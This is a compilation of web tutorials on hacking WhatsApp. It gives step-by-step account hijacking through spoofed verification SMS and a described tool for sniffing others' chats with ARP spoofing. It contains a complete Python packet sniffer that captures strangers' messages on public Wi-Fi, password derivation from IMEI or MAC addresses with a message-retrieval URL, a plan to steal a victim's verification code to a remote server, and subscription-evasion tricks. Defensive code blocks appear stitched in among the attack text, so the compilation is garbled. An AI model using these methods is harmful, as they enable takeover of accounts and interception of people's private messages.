
Hijack & Hack WhatsApp In Easy Steps

Hijack (someone else’s) Whatsapp with your iPhone

If you want to hijack someone else’s Whatsapp and receive messages addressed to that person with your iPhone, read on. (You don’t have an iPhone? See bottom.) When you install Whatsapp on your iPhone, the Whatsapp application contacts the Whatsapp servers, and the Whatsapp servers send you a verification SMS with a code in it. From that point a counter starts counting in the Whatsapp application. Within this time Whatsapp expects you to receive your verification SMS. If this period expires, Whatsapp offers you several other authentication methods (see below).



Here you choose the option “SMS”, and you will have to fill in your email address:



Your phone will now start sending an SMS to the Whatsapp servers for verification. You can cancel this, as it is not necessary.
What you’re going to do next is called SMS-spoofing. You can do this via many sites on the web. Choose one, and make up your fake SMS as shown in the picture below:



To: +447900347295
From: +(Country code)(mobile number)
Message: (your email address)
That’s all! Within minutes you will receive the activation code in your email to activate Whatsapp on your iPhone with someone else’s telephone number, and from that moment on you will receive messages addressed to that person on your iPhone.


The only way for Whatsapp to solve this issue is sending the verification SMS from their own servers and no other way.

If you have anything other than an iPhone, you're also able to hijack someone else’s Whatsapp. It’s even easier for you.
All other systems will start sending an SMS verification immediately from your own mobile phone! So you disconnect your mobile phone and try to send the verification SMS, which is impossible since you disconnected it. Check your outbox. There you will see the verification SMS. Copy that whole SMS to a website where you can spoof SMS. State the FROM field as the person’s Whatsapp you want to hijack, and fill in your own mobile number in the TO field.
That's it.
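The fix named above, a verification code that originates from the service's own servers, looks like this in outline. This is an added example, not code from WhatsApp or from the original post; the class, the `send_sms` hook, the limits and the phone numbers are hypothetical.

```python
import hashlib
import hmac
import secrets
import time

CODE_TTL_SECONDS = 300   # assumed code lifetime
MAX_ATTEMPTS = 5         # assumed guess limit per issued code


def verify_mobile_originated(inbound_sms, claimed_number):
    """Weak flow from the post: the service receives an SMS and trusts its
    sender field, which SMS delivery does not authenticate."""
    return inbound_sms["from"] == claimed_number


class ServerOriginatedVerifier:
    """Hardened flow: the service chooses a random code and sends it TO the
    claimed number; proof of ownership is being able to read that SMS."""

    def __init__(self, send_sms, clock=time.time):
        self._send_sms = send_sms   # hypothetical gateway hook: callable(number, text)
        self._clock = clock
        self._pending = {}          # number -> [salt, digest, expires_at, attempts_left]

    @staticmethod
    def _digest(salt, code):
        return hashlib.sha256(salt + code.encode("utf-8")).digest()

    def start(self, number):
        code = "%06d" % secrets.randbelow(10 ** 6)   # CSPRNG, not derived from the device
        salt = secrets.token_bytes(16)
        self._pending[number] = [salt, self._digest(salt, code),
                                 self._clock() + CODE_TTL_SECONDS, MAX_ATTEMPTS]
        self._send_sms(number, "Your verification code is " + code)

    def finish(self, number, submitted_code):
        entry = self._pending.get(number)
        if entry is None:
            return False
        salt, digest, expires_at, attempts_left = entry
        if self._clock() > expires_at or attempts_left <= 0:
            del self._pending[number]          # expired or guessed out: start over
            return False
        entry[3] -= 1
        if hmac.compare_digest(digest, self._digest(salt, submitted_code)):
            del self._pending[number]          # codes are single use
            return True
        return False


def demo():
    owner = "+15550100"                                        # constructed number
    forged = {"from": owner, "body": "claimant@example.test"}  # constructed message
    handset_inbox = {}                          # stands in for the owner's phone
    verifier = ServerOriginatedVerifier(handset_inbox.__setitem__)
    verifier.start(owner)
    real_code = handset_inbox[owner][-6:]
    wrong_code = "000000" if real_code != "000000" else "000001"
    return {
        "weak_accepts_forged_sender": verify_mobile_originated(forged, owner),
        "hardened_accepts_guess": verifier.finish(owner, wrong_code),
        "hardened_accepts_owner": verifier.finish(owner, real_code),
        "code_is_single_use": not verifier.finish(owner, real_code),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```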


How To Hack Whatsapp [Tutorial] - Whatsapp Sniffing App

TUTORIAL TO HACK WHATSAPP USING SNIFFER TOOL


WHATSAPP SNIFFER 2013

WATCH OUT THIS WHATSAPP SNIFFER HACK
[IN GERMAN]



Whatsapp Sniffing App - Hack, Cheat, Trick, Tip

WHATSAPP SNIFFER FOR ANDROID

Description:

 ****Requires ROOT and Busybox installed****

WhatsAppSniffer is a tool for rooted terminals to read the WhatsApp conversations on a WIFI network (Open, WEP, WPA/WPA2). It captures the conversations, pictures / videos and coordinates that are sent or received by an Android phone, iPhone or Nokia on the same WIFI network. It has not been tested with Windows Phone terminals. It can't read the messages written or received by BlackBerrys, as they use their own servers and not WhatsApp's.

This application is designed to demonstrate that the security of WhatsApp's communications is null. WhatsAppSniffer just uses the TCPDump program, which reads all the WIFI network packets and filters those which have WhatsApp's servers as origin or destination. All messages are in plain text, so it does not decrypt anything, complying fully with the legal terms of WhatsApp (3.C: "While we do not disallow the use of sniffers Such as Ethereal, tcpdump or HttpWatch in general, Any we do going efforts to disallow reverse-engineer our system, our protocols, or explore outside the boundaries of the ordinary requests made by clients WhatsApp .... ")

For WPA/WPA2 encrypted networks, it uses the tool ARPSpoof (optional).
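A defender on the same network can spot the ARPSpoof step mentioned above from the ARP replies themselves. The following is an added example, not part of the original post or of WhatsAppSniffer: it reads tcpdump-style ARP reply lines and reports IP addresses whose MAC binding changes; the sample lines, the addresses and the `known_good` parameter are constructed for illustration.

```python
import re
from collections import defaultdict

# Matches tcpdump's one-line rendering of an ARP reply ("<ip> is-at <mac>").
ARP_REPLY = re.compile(
    r"ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.IGNORECASE)

# Constructed sample capture: the gateway and one client are learned first,
# then a third MAC starts answering for both addresses.
SAMPLE_LINES = [
    "10:00:01.100000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28",
    "10:00:01.400000 ARP, Reply 192.168.1.23 is-at 00:11:22:33:44:23, length 28",
    "10:00:02.000000 IP 192.168.1.23.50514 > 203.0.113.9.5222: Flags [P.], length 61",
    "10:00:05.000000 ARP, Reply 192.168.1.1 is-at 02:00:00:00:00:66, length 28",
    "10:00:05.000200 ARP, Reply 192.168.1.23 is-at 02:00:00:00:00:66, length 28",
    "10:00:07.000000 ARP, Reply 192.168.1.1 is-at 02:00:00:00:00:66, length 46",
]


def find_arp_conflicts(lines, gateway_ip=None, known_good=None):
    """Return (conflicts, shared_macs).

    conflicts   : one record per (ip, mac) pair that contradicts the baseline.
    shared_macs : MACs that answered for more than one IP address.

    The baseline is trust-on-first-use unless `known_good` (ip -> mac) pins
    it; a capture that starts after the poisoning began learns the wrong MAC
    first, which is why pinning the gateway matters.
    """
    baseline = {ip: mac.lower() for ip, mac in (known_good or {}).items()}
    claims = defaultdict(set)
    conflicts = {}
    for lineno, line in enumerate(lines, start=1):
        match = ARP_REPLY.search(line)
        if match is None:
            continue                      # not an ARP reply
        ip = match.group("ip")
        mac = match.group("mac").lower()
        claims[mac].add(ip)
        expected = baseline.setdefault(ip, mac)
        if mac != expected:
            record = conflicts.setdefault((ip, mac), {
                "ip": ip,
                "expected_mac": expected,
                "seen_mac": mac,
                "first_line": lineno,
                "replies": 0,
                "severity": "high" if ip == gateway_ip else "medium",
            })
            record["replies"] += 1
    shared_macs = {mac: sorted(ips) for mac, ips in claims.items() if len(ips) > 1}
    return list(conflicts.values()), shared_macs


if __name__ == "__main__":
    found, shared = find_arp_conflicts(SAMPLE_LINES, gateway_ip="192.168.1.1")
    for record in found:
        print(record)
    print(shared)
```

A changed binding is not always hostile (DHCP reassignment and router failover also cause it), so treat the output as a lead to check against the switch or access point tables.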


Features:

- REQUIRES ROOT

- For now, there is only support for these characters:


a-zA-Z0-9:-()!¡¿?ñÑáéíóúüÁÉÍÓÚÜçÇ/


- Read conversations outgoing and incoming to Android, iPhone and Nokia phones.

- They are separated by phone number

- Notify when a message has been captured

- Ability to start a debug session saving all logs

- It matches phone numbers captured with agenda for coincidences


Free version

- Ads

- You can only read the first three conversations

- You can not delete conversations


***************** Known Bugs ***********************

Sometimes when you start the sniffer, your internet connection may end. To fix this, stop the program, stop WIFI and start WIFI again.

-If you activate the ARPSpoof in a very large network, the network can go slow or everybody else can be left without Internet.

****************************************************

Legal Terms

WhatsAppSniffer comes with absolutely no warranty. You use this software at your own risk. The developer is not responsible for any damages caused by WhatsAppSniffer or its usage. It's only the user's responsibility to check his country's laws in order to make sure that the usage of WhatsAppSniffer is permitted by law in his country. In some countries stealing someone's conversations might be prohibited by law. Always think about what you're doing! Stealing someone's conversations can cause real trouble for him and maybe for you.



How to hack WhatsApp Messenger on Nokia, iPhone & Android


WhatsApp is a cross-platform messaging application used by smartphones. It allows users to exchange instant messages and share media via 3G or WiFi with other users on the platform. Back in May 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted in plain text, which left accounts open to hijacking. WhatsApp finally released a security update for this problem and the system became locked down.

REQUIREMENTS:
  • 7Zip
  • A Windows Computer (Windows XP, Vista, Win 7, Win 8)
  • A Phone running WhatsApp (iPhone, Android, Nokia, Blackberry etc)
In this article I will talk about alternative methods of hijacking WhatsApp messages and other protocols using a variety of methods.
The first hack I'm going to talk about will spoof WhatsApp and have it think you are somebody else, allowing you to communicate under an alternative name. This hack works by tricking the WhatsApp verification servers by sending a spoofed request for an authorisation code intended for an alternative phone. This method is also known to work on several other IM applications based on iOS, Symbian & Android devices.

Hack 1

Install WhatsApp on your device
WhatsApp now starts a counter where it sends a verification message to its servers. If this verification fails after a specific time then WhatsApp offers alternative methods of verification. A message can be blocked by changing the message center number or pushing the phone into Airplane mode.
WhatsApp now offers an alternative method of verification
Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server.
Next we need to do some SMS-Spoofing
There are numerous ways of doing this for free. A quick google search will pull up a vast amount of services which can spoof email addresses.
If you are using an iPhone use the following details in the SMS spoofer application.
To: +447900347295
From: +(Country code)(mobile number)
Message: (your email address)
If you are using another device then check your outbox and copy the message details into the spoofer application and send the spoofed verification.
You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number.

Hack 2

The second attack I’m going to talk about is a little bit more professional. For users who can pull off MITM (Man in the Middle) attacks this is a sure way to rake in data from a public network. I came across the script at the 0x80 blog so I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python so it's nice and simple to work with and edit to make it work for similar chat applications.
You will also need to parse the traffic so check this link: http://www.secdev.org/projects/scapy/
Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see. Doing a MITM attack and peeking at the packets, we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. It is important to note this because this data can be used for some social engineering (calling the person to pull more information from them) or for checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and whatever else you're hunting for.

Example

DYN:~/whatsapp# python sniffer.py wlan0

#########################
## whatsapp sniff v0.1 ##
#########################

[+] Interface : wlan0
[+] filter : tcp port 5222

To : ***********
Msg : Hello, I will send you a file.

To : **********
Filename : .jpg
URL : https://mms*.whatsapp.net/a1/0/1/2/3/*md5hash*.jpg

From : ***********
Msg : Thanks file has been recieved, take this file too.

From : ***********
Filename : .jpg
URL : https://mms*.whatsapp.net/a2/0/2/3/1/*md5hash*.jpg

Code

#!/usr/bin/env python
# Python 2 script (print statements, "string_escape" codec); needs scapy.

import os
import sys
import scapy.all
import re

# State kept between packets so retransmitted messages are printed once.
Previous_Msg = ""
Previous_Filename = ""
Files = []
Messages = []
Urls = []

def banner():
    print "#########################"
    print "## whatsapp sniff v0.1 ##"
    print "## qnix@0x80.org ##"
    print "#########################\n"

def whatsapp_parse(packet):
    global Previous_Msg
    global Previous_Filename
    global Files
    global Messages
    global Urls
    src = packet.sprintf("%IP.src%")
    dst = packet.sprintf("%IP.dst%")
    sport = packet.sprintf("%IP.sport%")
    dport = packet.sprintf("%IP.dport%")
    raw = packet.sprintf("%Raw.load%")

    # Target Sending stuff
    if dport == "5222":
        Filename = ""
        toNumber = ""
        Url = ""
        Msg = ""
        try:
            # Keep only the digits of the payload and slice out the number.
            toNumber = re.sub("\D", "", raw)
            if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17]
            else: toNumber = toNumber[5:16]
            try:
                Filename = raw.split("file\\xfc")[1][1:37]
                Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
            except: pass
            try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
            except: pass
        except: pass
        if(len(toNumber) >= 10):
            if(len(Msg) >= 1 and Previous_Msg != Msg):
                Previous_Msg = Msg
                print "To : ", toNumber
                print "Msg : ", Msg
                Messages.append(Msg)
            elif(len(Filename) >= 1 and Previous_Filename != Filename):
                Previous_Filename = Filename
                print "To : ", toNumber
                print "Filename : ", Filename
                print "URL : ", Url
                Files.append(Filename)
                Urls.append(Url)

    # Received Messages
    if sport == "5222":
        Msg = ""
        fromNumber = ""
        Url = ""
        Filename = ""
        try:
            fromNumber = re.sub("\D", "", raw)
            if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17]
            else: fromNumber = fromNumber[5:16]
            try:
                Filename = raw.split("file\\xfc")[1][1:37]
                Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
            except: pass
            try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
            except: pass
        except: pass
        # The two conditions below were damaged on the page; they are
        # reconstructed here to mirror the sending branch above.
        if(len(fromNumber) >= 10):
            if(len(Msg) >= 1 and Previous_Msg != Msg):
                Previous_Msg = Msg
                print "From : ", fromNumber
                print "Msg : ", Msg
                Messages.append(Msg)
            elif(len(Filename) >= 1 and Previous_Filename != Filename):
                Previous_Filename = Filename
                print "From : ", fromNumber
                print "Filename : ", Filename
                print "URL : ", Url
                Files.append(Filename)
                Urls.append(Url)

def callback(packet):
    # Only packets that carry a payload on TCP port 5222 are parsed.
    sport = packet.sprintf("%IP.sport%")
    dport = packet.sprintf("%IP.dport%")
    raw = packet.sprintf("%Raw.load%")
    if raw != '??':
        if dport == "5222" or sport == "5222":
            whatsapp_parse(packet)

def main():
    banner()
    if(len(sys.argv) != 2):
        print "%s <interface>" % sys.argv[0]
        sys.exit(1)
    scapy.iface = sys.argv[1]
    scapy.verb = 0
    scapy.promisc = 0
    expr = "tcp port 5222"

    print "[+] Interface : ", scapy.iface
    print "[+] filter : ", expr
    scapy.all.sniff(filter=expr, prn=callback, store=0)

    print "[+] iface %s" % scapy.iface

if __name__ == "__main__":
    main()


2 Ways To Get WhatsApp Subscription For Free

Get Free Subscription of WhatsApp With Easy Steps

In recent months there have been rumors that Whatsapp for Google Android would become a paid app. But there are also some rumors about alternatives to avoid paying for the annual subscription.
Whatsapp is certainly the most popular instant messaging app for smartphones. Normally we can find any smartphone user with this app installed. The strategy of the company has been to give Android users a free messaging app. In part this has been possible because the company behind the project has offered the service in test mode for over a year. However, the reason many users, especially on Android, did not realize that a subscription is required is that the company has extended this trial period gradually and individually until a few months ago.
Transition period from free to paid subscription
From that moment some users reported that the application was asking them to “renew” their subscription, something that was confirmed officially barely a few days ago. However, that short time has been enough to detect some methods to continue enjoying Whatsapp services for free.
Methods to do it:
  • Let the Whatsapp trial period expire.

    Thus, the company is forced to extend the trial period again (at least it seems there are Android users enjoying this option). It seems Whatsapp is trying to prevent users from migrating to other alternatives such as Spotbros, Line,… so, once the servers detect the inactivity of a number associated with an expired Whatsapp account, they proceed to restore the free trial period.

  • Associate our phone number to the Whatsapp application for iPhone

    The most reliable method is to associate our phone number to the Whatsapp application for iPhone (maybe not the best option, but it is one of them). Thus, the account will enjoy the conditions arranged for Apple terminals, which mainly means a lifetime subscription paid for with the application. Later, after inserting the SIM in another terminal, in this case an Android smartphone, the conditions remain unchanged for our phone number. This method requires access to an iPhone, which may involve more trouble than the annual payment for the Whatsapp service itself. Still, it is interesting for those who can do this. To understand why this method works, note that Whatsapp was created initially for iPhone, and the service conditions specified that payment for the application included use of the instant messaging network free for life.


Install Whatsapp on WiFi Only Devices

Whatsapp is an awesome tool for communicating with friends and family, and it is savvy too. The obstacle is that Whatsapp does not permit users to install the application on WiFi-only devices, which is what the majority of us have.

Steps To Follow:


Step 1:
First of all, go to the Google Play store and find the latest version of Whatsapp. Search for Whatsapp and see whether your device supports the application or not.

Step 2:
If you are using a PC, access any online APK store, for instance apknew.com, to get the latest APK version of Whatsapp and save it on your machine. If you can download the APK file directly on your Android WiFi-only device, skip to step 5.

Step 3:
Once downloaded, connect your device to the computer and locate the Whatsapp APK file. Make a separate folder for APKs on your Android device for easy identification later on.

Step 4:
Paste the downloaded Whatsapp messenger APK file into that folder and disconnect the device.

Step 5:
Now open the file manager on your Android device and find the APKs folder. From there locate the Whatsapp messenger file and select it to start installation.

Step 6:
The following splash screen will ask for your permission to install the application on the device; press Install to proceed.

Step 7:
The next screen will notify you when the installation finishes successfully. If not, repeat the procedure. If the installation fails more than once, download the file again or pick an older version of the application for your device. Then press Done to exit the installation.

Step 8:
Now you are ready and can start the setup of the Whatsapp application on your device. Locate the application in the application menu and start the setup process by accepting the terms and conditions.

Step 9:
The following screen will prompt you for your mobile number. Enter a number which is not already connected or in use on a different device with Whatsapp messenger; press Next to proceed.

Step 10:
The application will confirm your number; if correct, press "OK", or hit "Edit" to make changes and continue.

Step 11:
The application will now verify your device and will send the verification message through SMS to your mobile number, I think it's very simple. The message contains the verification code that you need to enter manually. Wait for the verification procedure to complete and you could be moved to the following step automatically. It will take precisely five minutes.

Step 12:
The following screen will prompt you to enter the verification code; enter the 6 digit code and continue, after that verify it.

Step 13:
The application, once activated, will show the number of days of service available on your number. Press Continue to move to the chats page and begin messaging with your device.


HOW TO GET WHATSAPP FREE FOREVER

In recent months there have been rumors that Whatsapp for Android would become a paid app. But there are also some rumors about alternatives to avoid paying for the annual subscription.
Whatsapp is certainly the most popular instant messaging app for smartphones. Normally we can find any smartphone user with this app installed. The strategy of the company has been to give Android users a free messaging app. In part this has been possible because the company behind the project has offered the service in test mode for over a year. However, the reason many users, especially on Android, did not realize that a subscription is required is that the company has extended this trial period gradually and individually until a few months ago.
Transition period from free to paid subscription
From that moment some users reported that the application was asking them to “renew” their subscription, something that was confirmed officially barely a few days ago. However, that short time has been enough to detect some methods to continue enjoying Whatsapp services for free.
Methods to do it:
* Let the Whatsapp trial period expire.
Thus, the company is forced to extend the trial period again (at least it seems there are Android users enjoying this option). It seems Whatsapp is trying to prevent users from migrating to other alternatives such as Spotbros, Line,… Therefore, once the servers detect the inactivity of a number associated with an expired Whatsapp account, they proceed to restore the free trial period.
* Associate our phone number to the Whatsapp application for iPhone
The most reliable method is to associate our phone number to the Whatsapp application for iPhone (maybe not the best option, but it is one of them). Thus, the account will enjoy the conditions arranged for Apple terminals, which mainly means a lifetime subscription paid for with the application. Later, after inserting the SIM in another terminal, in this case an Android smartphone, the conditions remain unchanged for our phone number. This method requires access to an iPhone, which may involve more trouble than the annual payment for the Whatsapp service itself. Still, it is interesting for those who can do this. To understand why this method works, note that Whatsapp was created initially for iPhone, and the service conditions specified that payment for the application included use of the instant messaging network free for life.
However, I’m going to be honest. In my opinion there is no problem to pay less than one or two dollars to keep running correctly an Android app very useful for me.
Now it’s your choice.


TRICK TO USE Whatsapp ON WINDOWS COMPUTERS

Whatsapp is a popular messaging service that we all know. With Whatsapp we can send text messages, images, audio clips and much more free of cost (if your net skim is activated). The app is also available for all popular operating platforms.
Today I am going to tell you how to use Whatsapp on your Windows computer. This trick is based on the BlueStack app player.

What you have to do is:
1. Download BlueStack app Player. For download and more info about BlueStack Click Here.

2. After the download, install and open it. (It looks similar to the picture.)

3. Now click on the right navigation button to see the "More App" icon. Clicking it takes you to a browser window. Log in to the website, and it will then ask you to download the "Cloud Connect app" on your Android device. This app helps sync the Android device with the app player.

4. After that, install the Cloud Connect Android app on your device from the application store. It will ask for a PIN, which you got in the previous step. Enter the code and your apps will be synced automatically with the app player. Or you can manually tick the apps to sync (you must have transferred the Whatsapp application).

5. After adding Whatsapp, reinitialise Whatsapp with the same method (verification code and all that) as on the device.
You're done. Enjoy Whatsapp on Windows OS. This method is a little bit long, but in the end it's amazing.

NOTE: Whatsapp cannot be active on more than one device, hence you have to remove it from your mobile or register using another number.
Source-http://www.itrickers.com


Whatsapp Trick to Hide Your "Last Seen" or "Online" Status

Whatsapp doesn't need any introduction, as it has taken the place of SMS. All of us use Whatsapp every day; some of the reasons are quick and effective responses, a totally ad-free application, better group interaction and many more. Apple users have to purchase this app for lifetime use, but this is not the same for Android users; for them there is a subscription plan for a year or more (free for the first year). As this app is in high demand, there are many tricks and tools for modifying some features of this application.
Today I am going to give you a trick to disable the "Last Seen" or "Online" status.
Many times you feel like someone is watching you through "Last Seen", or you want to appear offline to avoid someone. So here is a trick to freeze your "Last Seen" status. There are two methods, each followed step by step.

Last Seen Timestamp [Official]
This feature is available only for Apple users. There is no confirmation for the Android version, but this is a much-needed feature, so it has a good chance of arriving in a future update.
  1. Go to Whatsapp Settings→Chat Settings→Advanced→(Turn off) Last Seen Timestamp

From now on no one can trace your Last Seen time. This feature takes 24hr to take effect and also takes 24hr to toggle back.
Note that no one can trace your Last Seen, but if you are online then you will still appear as "Online", so this is a limitation of this method.

Manage Your Data Connection
This trick works on all platforms but is not convenient for everyone. Here you have to manage your data connection, turning it on and off at the right time. Let me explain.
When you open Whatsapp, your online time is saved by the application and it appears on your profile as seen from other users' accounts. So basically what you have to do is:
  1. Disable your data or any other net connection using the toggle shortcut menu or anything else.
  2. Now open Whatsapp and read messages, write messages, or do anything.
  3. After that, exit Whatsapp completely, including from the background.
  4. Enable your data plan or your net connection.
That’s it! You're done; by doing this your Last Seen time is not updated. In practice this is a tricky and lengthy process for sending a message.
However, there are many apps available to do it for you. Some of them are listed below:
  1. WhatsApp Tools
  2. Invisible Whatsapp Free
  3. WhatsApp Last Seen Remover
  4. WhatsApp Last Seen and Lock (Paid)
  5. Whatsapp Widget (root needed)


STEPS TO HACK WHATSAPP

Whatsapp

Many of my friends were like "Dude u on whatsapp?".

I got that question from many of my friends. So finally decided to download "whatsapp".
Even u guys should try it out, if u haven't tried it yet!
So i have been using this app from past 3 days, and i got value idea about how it works and how it authenticates You as You.

If you people would have observed -

1. You can read all the messages Offline o.O
2. You can access all d profile pictures offline.

But Whatsapp encrypts all d DATA. But guys "hold on". Obviously it can be decrypted or any other way to access all d messages..

"" There's always a way "" :D

Here what 'm going to talk about is not just getting there messages which can be accessed offline.
'll add that with video or screenshot in my next post :p

The method which i thought about when i was writing my "exams in coll 2day" is interesting..
And YA while writing exam.. Lol :D Cant help it ...
That's ME :p

Enough of Stories and background on whatsapp and Myself :p

Lets Get into Tech stuff


Its theoretical because i haven't tried it.
I'll try it and post with video or screenshots s00n :-)

Ohk guys, lets get busy


So if you people have observed you can not have your whatsapp account logged in in two devices. Means session is given to only 1 mac address. If the MAC [ Media Access Control ] address of the device requesting access changes then whatsapp asks you to re-verify your account! 

And come on, "whatsapp people" you think Mac address can't be spoofed. But yeah Nice try whatsapp developers :p

So here d point you will have to get access to the phone to get the victim's phone "MAC address + the verifying message" which is received to verify your device.

Simple you code an app to get the user's MAC address and checking the message from whatsapp in the victim's inbox. Very easy in case of android devices.

As soon as the message is received Push the "MAC address" + "Verifying code" to your server or mail it to your ID. That depends on your convenience.

That's it guys.

Spoof your phone's MAC address to your Victims address and install whatsapp and type the "verify code".

And done guys. You get complete access to the victims whatsapp ID..
where as you can keep spying/watching your victims movements :D
i.e 2 people - U + ur victim are using the same ID from different devices.

But its very LAME to spy on other people's private messages. So try not to.

This article is just an theoretical approach and only for understanding and knowledge purpose.
And 'm not responsible for any thing you do after reading this post :D :p

I have no clue up-to which extent the approach will work.

Any ways Thanks for reading this post.
Hope you people enjoyed it..


How to Hack WhatsApp Messenger | Build WhatsApp API Client


Desktop IMs have long been our favorite mode of communication. But with time, their significance has definitely come down.
With smartphones taking up a large part of our daily life, IM services like Whatsapp, iMessage, BBM, etc. have emerged and exchange more messages every second. WhatsApp delivers more than 1 billion messages per day, and yet it's the most insecure way of communication.

As per a recent security analysis, WhatsApp is a totally insecure way of communicating with friends.

WhatsApp Encryption

You will be surprised to know that until August 2012, messages sent through the WhatsApp service were not encrypted in any way; everything was sent in plaintext. That means if you were using Whatsapp on a public wifi, everything could be captured by anyone else sniffing on the wireless network. The latest WhatsApp uses encryption, but this new encryption is broken. And still, the phone number is sent out in plaintext.
The local storage isn’t any different; you can check out the WhatsApp Database Encryption Project Report.

WhatsApp API & Reverse Engineering

If you know XMPP, the same protocol used by facebook, GTalk, and several others, you can try your hands-on WhatsAPI, an API for WhatsApp messenger.
WhatsApp uses customized XMPP server with proprietary extensions, named internally as FunXMPP.

1. WhatsApp Authentication / Login Mechanism

Just like any other XMPP service, WhatsApp uses a jabber ID and password to log in. The password is hashed, stored on the servers upon account creation and used transparently every time the client connects to the server.

It's an incredibly horrible implementation. As a researcher found out, the username is the user’s phone number, which an attacker probably already knows.
On Android, the password is an md5 hash of the reversed IMEI number:
$imei = "112222223333334"; // example IMEI
$androidWhatsAppPassword = md5(strrev($imei)); // reverse IMEI and calculate md5 hash
On iOS, the password is generated from the devices WLAN MAC address:
$wlanMAC = "AA:BB:CC:DD:EE:FF"; // example WLAN MAC address
$iphoneWhatsAppPassword = md5($wlanMAC.$wlanMAC); // calculate md5 hash using the MAC address twice
Both the IMEI and the MAC address are easily retrievable from a device if you have physical access to it. The MAC address is much easier to capture, as you can sniff on the wireless network to which the iOS device is connected.
The JID is a concatenation between your country’s code and mobile number.
Initial login uses Digest Access Authentication. You can try this for yourself:
https://r.whatsapp.net/v1/exist.php?
cc=$countrycode&in=$phonenumber&udid=$password

$countrycode = the country calling code
$phonenumber = the users phone number 
(without the country calling code)
$password = see above, for iPhone use md5($wlanMAC.$wlanMAC), 
for Android use md5(strrev($imei))
The response you would receive would be in XML, containing messages designated for your phone.
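The flaw in both derivations above is that the password is a pure function of identifiers the device exposes, so it contains no secret. The following added example (not code from WhatsApp or WhatsAPI) shows an audit check that recognises such a credential, next to a server-issued random secret that cannot be rebuilt that way; `explain_credential`, `CredentialStore` and the sample JID are hypothetical names, and the identifiers are the page's own example values.

```python
import hashlib
import hmac
import secrets


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


# The two derivations quoted on the page, expressed over a dict of identifiers.
PAGE_DERIVATIONS = {
    "android: md5(reversed IMEI)": lambda ids: md5_hex(ids["imei"][::-1]),
    "ios: md5(MAC + MAC)": lambda ids: md5_hex(ids["wlan_mac"] * 2),
}


def explain_credential(credential, identifiers):
    """Audit check: return the name of the derivation that rebuilds
    `credential` from device identifiers alone, or None if none does."""
    for name, derive in PAGE_DERIVATIONS.items():
        try:
            candidate = derive(identifiers)
        except KeyError:
            continue                      # identifier not supplied
        if hmac.compare_digest(candidate, credential.lower()):
            return name
    return None


class CredentialStore:
    """Hardened provisioning: the server mints a random secret at enrolment,
    hands it to the client once and keeps only a salted hash of it."""

    def __init__(self):
        self._records = {}                # jid -> (salt, digest)

    @staticmethod
    def _hash(salt, secret):
        return hashlib.sha256(salt + secret.encode("utf-8")).digest()

    def enroll(self, jid):
        secret = secrets.token_hex(32)    # 256 random bits, unrelated to the device
        salt = secrets.token_bytes(16)
        self._records[jid] = (salt, self._hash(salt, secret))
        return secret

    def authenticate(self, jid, secret):
        # Unknown JIDs are checked against a dummy record so both paths do
        # the same work.
        salt, digest = self._records.get(jid, (b"\0" * 16, b"\0" * 32))
        return hmac.compare_digest(digest, self._hash(salt, secret))


def demo():
    ids = {"imei": "112222223333334", "wlan_mac": "AA:BB:CC:DD:EE:FF"}
    legacy = md5_hex(ids["imei"][::-1])   # credential under the page's Android scheme
    store = CredentialStore()
    jid = "15550100"                      # constructed JID
    issued = store.enroll(jid)
    return {
        "legacy_rebuilt_from": explain_credential(legacy, ids),
        "issued_rebuilt_from": explain_credential(issued, ids),
        "issued_authenticates": store.authenticate(jid, issued),
        "legacy_authenticates": store.authenticate(jid, legacy),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```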

2. Text Message communication

Messages are basically sent as TCP packets, following WhatsApp’s own format (unlike what’s defined in XMPP RFCs).
Photos, Videos and Audio files shared with WhatsApp contacts are HTTP-uploaded to a server before being sent to the recipient(s) along with Base64 thumbnail of media file (if applicable) along with the generated HTTP link as the message body.

WhatsApp Privacy Leak

WhatsApp shares your contacts with the server, we all know that. But the way it is done is ridiculously insecure. It basically sends contact information as:
https://sro.whatsapp.net/client/iphone/iq.php
?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1
&u[]=$friend2&u[]=$friend3&u[]=$friend4
The server response looks like:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>P</key>
<string>1234567890</string>
<key>T</key>
<integer>10817</integer>
<key>S</key>
<string>Some Status Message</string>
<key>JID</key>
<string>23xxxxxxxxx</string>
<key>NP</key>
<true/>
</dict>
</array>
</plist>
Key “P” is the user's phone number, Key “T” seems to be the uptime(?), Key “S” is the user's status message. Not sure about “JID” and “NP” yet – if you have a smart guess let me know. All this information is public.


Steps to Get WhatsApp Subscription for 10 Years

1. First, delete your WhatsApp account from your phone.

2. Now find a friend or anyone who has an Apple iPhone or iPad, of any version.

3. Then register WhatsApp with your number on their iPhone or iPad.

4. After entering your number on the iPhone/iPad, you will get a verification code on your mobile. Check your inbox and enter the verification code on the iPhone/iPad.

5. After these steps WhatsApp will load and start on the iPhone. Check the WhatsApp account and it will have a paid subscription till 2022.

Final step: you now have a paid WhatsApp subscription for 10 years.

Now simply delete your account from the iPhone/iPad. Then download WhatsApp on any device it supports, enter your number and verify it. You will see that you have got 10 years of WhatsApp free.


